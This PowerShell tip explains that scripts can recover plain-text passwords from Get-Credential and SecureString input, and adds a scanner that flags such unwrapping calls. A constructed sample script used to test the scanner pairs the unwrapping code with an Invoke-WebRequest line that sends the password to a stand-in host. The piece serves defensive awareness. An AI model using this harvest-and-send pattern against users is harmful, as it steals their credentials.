Careful with Get-Credential and SecureStrings

by Jan 11, 2017

Sometimes, scripts interactively ask for credentials, or passwords. Always be aware that the script author can get to the plain text of all entered information. Only enter sensitive information if you trust the script and author.

Please note: this is not a PowerShell issue. It is a general issue with all software: whatever code receives a secret can read it. PSCredential and SecureString keep the plain text out of casual view (transcripts, variable dumps, long-lived managed strings) and, on Windows, encrypt the characters while they sit in memory. They do not hide the secret from the script that receives the object, and .NET does not encrypt SecureString contents in memory on non-Windows platforms at all.

Let’s see how a script could exploit an entered password. If a script asks for a complete credential, it could then examine the credential object and extract the plain text password:

# The prompt looks like any other credential dialog...
$credential = Get-Credential

# ...but the script now holds the PSCredential object, and
# GetNetworkCredential() returns a NetworkCredential whose
# Password property is the plain text
$password = $credential.GetNetworkCredential().Password

"The password entered was: $password"

Likewise, when you are prompted to enter a password as secure string, the script author could again find out the entered plain text:

$password = Read-Host -AsSecureString -Prompt 'Enter Password'

# this is how the owner of a secure string can get back the plain text:
# copy the decrypted characters into an unmanaged BSTR and read them out.
# PtrToStringBSTR is used instead of PtrToStringAuto because the latter
# assumes a UTF-8 buffer on Linux/macOS and returns a truncated string there.
$BSTR = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($password)
try {
    $plaintext = [System.Runtime.InteropServices.Marshal]::PtrToStringBSTR($BSTR)
}
finally {
    # zero and free the unmanaged copy, otherwise the plain text
    # stays in process memory until the heap block is reused
    [System.Runtime.InteropServices.Marshal]::ZeroFreeBSTR($BSTR)
}

"The password entered was $plaintext"
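Both snippets above show the script author's side. The practical question for the person at the prompt is how to tell, before typing, whether a script unwraps what it asks for. The following scanner is an added example and not part of the original tip: it parses a script with PowerShell's own parser and lists every call that turns a PSCredential or SecureString back into plain text (the Marshal.SecureStringTo* methods, GetNetworkCredential(), and ConvertFrom-SecureString -AsPlainText, which exists in PowerShell 7 and later). The function name Find-SecretUnwrapping and the sample script it is run against are assumptions made for this demo.

```powershell
using namespace System.Management.Automation.Language

# Added example, not from the original tip: list the places in a script that
# turn a PSCredential or SecureString back into plain text. The function name
# is an assumption for this demo.
function Find-SecretUnwrapping {
    [CmdletBinding()]
    param(
        # Script source to inspect, e.g. (Get-Content -Raw .\untrusted.ps1)
        [Parameter(Mandatory)]
        [string]$ScriptText
    )

    # Methods that hand the plain text to whoever holds the object
    $unwrapMethods = @(
        'GetNetworkCredential'               # PSCredential -> NetworkCredential.Password
        'SecureStringToBSTR'                 # Marshal: SecureString -> unmanaged buffer
        'SecureStringToGlobalAllocUnicode'
        'SecureStringToCoTaskMemUnicode'
        'SecureStringToGlobalAllocAnsi'
        'SecureStringToCoTaskMemAnsi'
    )

    $tokens = $null
    $errors = $null
    $ast = [Parser]::ParseInput($ScriptText, [ref]$tokens, [ref]$errors)
    if ($errors.Count -gt 0) {
        throw "Script does not parse: $($errors[0].Message)"
    }

    # Walk every node, including nested script blocks and functions
    $hits = $ast.FindAll({
        param($node)
        # $cred.GetNetworkCredential()  or  [Marshal]::SecureStringToBSTR(...)
        if ($node -is [InvokeMemberExpressionAst]) {
            return ($node.Member -is [StringConstantExpressionAst]) -and
                   ($unwrapMethods -contains $node.Member.Value)
        }
        # ConvertFrom-SecureString -AsPlainText (PowerShell 7+)
        if ($node -is [CommandAst]) {
            $hasAsPlainText = $node.CommandElements | Where-Object {
                $_ -is [CommandParameterAst] -and $_.ParameterName -eq 'AsPlainText'
            }
            return ($node.GetCommandName() -eq 'ConvertFrom-SecureString') -and [bool]$hasAsPlainText
        }
        return $false
    }, $true)

    foreach ($hit in $hits) {
        [pscustomobject]@{
            Line = $hit.Extent.StartLineNumber
            Code = $hit.Extent.Text
        }
    }
}

# Constructed sample: the two patterns from the tip, wrapped in a script that
# looks like an ordinary "log on to a server" helper. The host name is made up.
$untrustedScript = @'
param([string]$Server = 'srv01')
$credential = Get-Credential -Message "Log on to $Server"
$leak = $credential.GetNetworkCredential().Password
$pw = Read-Host -AsSecureString -Prompt 'Enter Password'
$bstr = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($pw)
$plain = [System.Runtime.InteropServices.Marshal]::PtrToStringBSTR($bstr)
Invoke-WebRequest -Uri "https://example.invalid/collect?p=$leak"
'@

Find-SecretUnwrapping -ScriptText $untrustedScript | Format-Table -AutoSize
```

For a real file, pass (Get-Content -Raw .\script.ps1) as -ScriptText. On the constructed sample the report names the GetNetworkCredential() call and the SecureStringToBSTR call, which is exactly the pair of lines you would want to read before entering anything. Treat an empty report as "nothing obvious", not as proof of safety: a script can reach the plain text in ways this does not catch, for example by building the method name at runtime, calling a helper in a DLL, or simply asking for the password with a plain Read-Host. The point is to make the common patterns visible, and then to fall back on the rule from the top of this tip: only enter the secret if you trust the script and its author.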
